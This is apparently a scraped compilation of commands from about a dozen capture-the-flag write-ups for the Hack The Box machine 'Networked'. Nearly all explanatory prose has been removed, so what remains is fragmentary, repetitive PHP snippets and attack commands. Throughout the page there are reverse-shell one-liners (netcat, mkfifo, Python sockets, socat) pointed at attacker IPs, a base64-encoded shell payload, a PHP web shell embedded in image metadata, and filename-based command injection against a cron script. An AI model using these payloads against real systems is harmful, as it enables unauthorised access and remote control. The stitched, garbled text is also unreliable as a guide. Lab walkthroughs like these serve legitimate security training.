
NETWORKED WRITEUP & WALKTHROUGH

For now, this is a list of commands by various authors.

0xdf   [writeup]
2953,067
Omniscient

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.146
nmap -p 80,22,443 -sV -sC -oA scans/nmap-tcpscripts 10.10.10.146
tar xvf backup.tar
tar xvf backup.tar
26       if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
php -a
php > $filename="image.png";
php > $pieces = explode('.',$filename); print_r($pieces);
php > $name= array_shift($pieces); echo $name;
php > $name = str_replace('_','.',$name); echo $name;
php > $ext = implode('.',$pieces); echo $ext;
php > $filename="image.php.png";
php > $pieces = explode('.',$filename); print_r($pieces);
php > $name= array_shift($pieces); echo $name;
php > $name = str_replace('_','.',$name); echo $name;
php > $ext = implode('.',$pieces); echo $ext;
file shell.png
nc -lnvp 443
bash-4.2$ ls -l
php /home/guly/check_attack.php
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
ls -a
php > $files = preg_grep('/^([^.])/', scandir('.')); print_r($files);
nc -e sh 10.10.14.7 443
bash-4.2$ nc -e sh 10.10.14.7 443
nc -lnvp 443
echo nc -e /bin/bash 10.10.14.7 443 | base64 -w0
bash-4.2$ echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh
nc -lnvp 443
bash-4.2$ touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b'
a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b
a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
exec("nohup /bin/rm -f /var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b > /dev/null 2>&1 &");
nc -lnvp 443
sudo -l
[guly@networked ~]$ sudo -l
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sudo /usr/local/sbin/changename.sh
cat /etc/sysconfig/network-scripts/ifcfg-guly
command not found



0xRick   [writeup]
89146
Omniscient

root@kali:~/Desktop/HTB/boxes/networked# nmap -sV -sT -sC -o nmapinitial networked.htb
root@kali:~/Desktop/HTB/boxes/networked# gobuster -u http://networked.htb/ -w /usr/share/wordlists/dirb/common.txt
backup.tar                                           100%[=====================================================================================================================>]  10.00K  --.-KB/s    in 0.1s
root@kali:~/Desktop/HTB/boxes/networked/backup# ls -la
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
echo '
'."\n";
if (in_array($file, $ignored)) continue;
if (!($check[0])) {
if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
if ($i == 1) {
echo "\n";
echo '\n";
if ($i == 4) {
echo "\n";
if ($i < 4 && $i > 1) {
echo "\n";
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if (!$success) {
echo "

Unable to save file.";
echo "

file uploaded, refresh gallery";
root@kali:~/Desktop/HTB/boxes/networked# echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f");' >> ./shell.php.png
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337
which python
sh-4.2$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337
bash-4.2$ ls -al
bash-4.2$ ls -al
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch '; nc 10.10.xx.xx 1338 -c bash'
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338
python -c "import pty;pty.spawn('/bin/bash')"
root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo
root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338
[guly@networked ~]$ ls -al
sudo -l
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test bash
[root@networked ~]# ls -la


 
 
 
     jirbj    [writeup]  
 14521
 Guru  
 

nmap -sV -p- -T4 10.10.10.146
tar xvf backup.tar
cat upload.php
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if (!$success) {
echo "

Unable to save file.";
echo "

file uploaded, refresh gallery";
nc -nlvp 4444
http://10.10.10.146/uploads/10_10_14_5.php.jpg?cmd=nc 10.10.14.5 4444 -e /bin/bash
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.2$ ls -la
bash-4.2$ ls -la
cat crontab.guly
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
nc -nlvp 5555
bash-4.2$ touch "; nc 10.10.14.5 5555 -e bash"
bash-4.2$ ls -la
bash-4.2$ echo "nc 10.10.14.5 5555 -e /bin/bash" > ./shell.sh
python -c "import pty;pty.spawn('/bin/bash')"
[guly@networked ~]$ ls -la
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sh-4.2# ls -la
   

 
 
 
     luckolen    [writeup]  
 491
 Hacker  
 

luc@kali:~/HTB/Networked$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.146
luc@kali:~/HTB/Networked$ gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp"
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if (!$success) {
echo "

Unable to save file.";
echo "

file uploaded, refresh gallery";
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
luc@kali:~/HTB/Networked$ sudo nc -lnvp 443
bash-4.2$ ls -R
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
bash-4.2$ ls -l
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch '/var/www/html/uploads/; nc 10.10.14.9 444 -c bash'
10_10_14_9.jpg  10_10_14_9.php.jpg  127_0_0_1.png  127_0_0_2.png  127_0_0_3.png  127_0_0_4.png  ; nc 10.10.14.9 444 -c bash  index.html
luc@kali:~/HTB/Networked$ sudo nc -lnvp 444
cat /home/guly/user.txt
[guly@networked ~]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test bash
   

 
 
 
     phaz0n    [writeup]  
 3812
 Hacker  
 

nmap -sC -sV 10.10.10.146
gobuster dir -u http://10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
nc -nlvp 443
nc -nlvp 443
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
cd /var/www/html/uploads
touch "test.txt"
php /home/guly/check_attack.php
rm -f /var/www/html/uploads/test.txt
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
bash-4.2$ touch "; nc 10.10.14.27 4444 -e '/bin/bash'"
socat file:`tty`,raw,echo=0 tcp-listen:4444
bash-4.2$ touch "; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444"
rm -f /var/www/html/uploads/; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
sudo -l
[guly@networked /]$ sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
test
ps /tmp/foo
nc -nlvp 3333
[guly@networked ~]$ echo "nc -e /bin/bash 10.10.14.27 3333" > /tmp/foo
ps /tmp/foo
nc -nlvp 3333
   

 
 
 
     padraignix    [writeup]  
 3415
 Elite Hacker  
 

cat upload.php
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file1.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file2";
cat lib.php
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
cat crontab.guly
cat check_attack.php
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
sh-4.2$ touch "no; nc -c bash 10.10.xx.xx 31337"
touch "no; nc -c bash 10.10.xx.xx 31337"
sudo -l
cat /usr/local/sbin/changename.sh
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
sudo -u root /usr/local/sbin/changename.sh
   

 
 
 
     samirettali    [writeup]  
 458
 Pro Hacker  
 

nmap -A -T4 10.10.10.146
gobuster dir -q -t 40 -w raft-large-directories.txt -u http://10.10.10.146
gobuster dir -q -t 40 -w raft-large-files.txt -u http://10.10.10.146
tar -xvf backup.tar
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if (!$success) {
echo "

Unable to save file.";
echo "

file uploaded, refresh gallery";
#echo "name $name - ext $ext\n";
return array($name,$ext);
return array($name,$ext);
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
if (function_exists('finfo_file')) {
if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
return $file_type;
if (function_exists('mime_content_type'))
if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
return $file_type;
return $file['type'];
if (strpos($mime_type, 'image/') === 0) {
return true;
return false;
exiftool -Comment='' hackthebox.png
nc -lnvp 1337
nohup /bin/rm -f $path; ls > /dev/null 2>&1 &
; nc 10.10.14.1 1338 - bash
touch \;nc\ 10\.10\.14\.4\ 1338\ -c\ bash
nc -nlvp 1338
python -c "import pty; pty.spawn('/bin/bash')"
[guly@networked ~]$ wc -c user.txt
[root@networked network-scripts]# wc -c /root/root.txt
   

 
 
 
     nullarmor    [writeup]  
 1026
 Pro Hacker  
 

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.146 -t 25
if (!empty($_FILES["myFile"])) {
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "

An error occurred.";
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if (!$success) {
echo "

Unable to save file.";
echo "

file uploaded, refresh gallery";
exiftool -Comment='' shell.php.jpeg
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
command injection
;nc -e \$(which bash) 10.10.14.22 4444
touch ";nc -e \$(which bash) 10.10.14.22 4444"
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
   

 
 
 
     borari    [writeup]  
 721
 Pro Hacker  
 

ssh on tcp/22
wget 
tar -xvf backup.tar
$sock, 1=>$sock, 2=>$sock), $pipes); ?>
nc -nvlp 443
ls /home
sh-4.2\$ ls -lAh /home/guly
ls -lAh /home/guly
sh-4.2\$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash-4.2\$ curl -s  \| bash /dev/stdin -l 1
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
//echo "prefix: $prefix - fname: $filename
\n";
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
return array($ret,$msg);
sh-4.2\$ ls -lAh
ls -lAh
sh-4.2\$ touch \-- \'/var/www/html/uploads; nc -c bash 10.10.14.18 445\'
sh-4.2\$ ls -lAh
ls -lAh
nc -nvlp 445
\[guly@networked shm\]\$ sudo -l
curl -s  \| bash /dev/stdin -l 1
\[guly@networked \~\]\$ export NAME=\'; nc -c 10.10.14.18 443\'
; nc -c 10.10.14.18 443
guy0 nc -c bash 10.10.14.18 443
nc -c bash 10.10.14.18 443
   

 
 
 
     0x3ashry    [writeup]  
   
 

gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory.txt  2>/dev/null
tar xvf backup.tar
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '

Invalid image file.';
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
if (!($valid)) {
echo "

Invalid image file";
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
rm -f
touch "; nc -c bash 10.10.16.10 5555"
sudo -l
!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
   

 
 
 
     Hilbert    [writeup]  
   
 

gobuster dir -w  -x .php,.txt -o  -u http://10.10.10.146
exiftool -DocumentName="';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';} __halt_compiler();?>" hilbert.jpg
root@kali:~/HTB/Boxes/Networked# nc -nlvp 1234
if ($value == 'index.html') {
if (!($check[0])) {
echo "attack!\n";
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
sh-4.2$ touch ";nc 10.10.14.3 1235 -c bash"
root@kali:~/HTB/Boxes/Networked# nc -nlvp 1235
   

 Not affiliated with Hack The Box.

';
echo "uploaded by $check[1]";
echo "";
echo "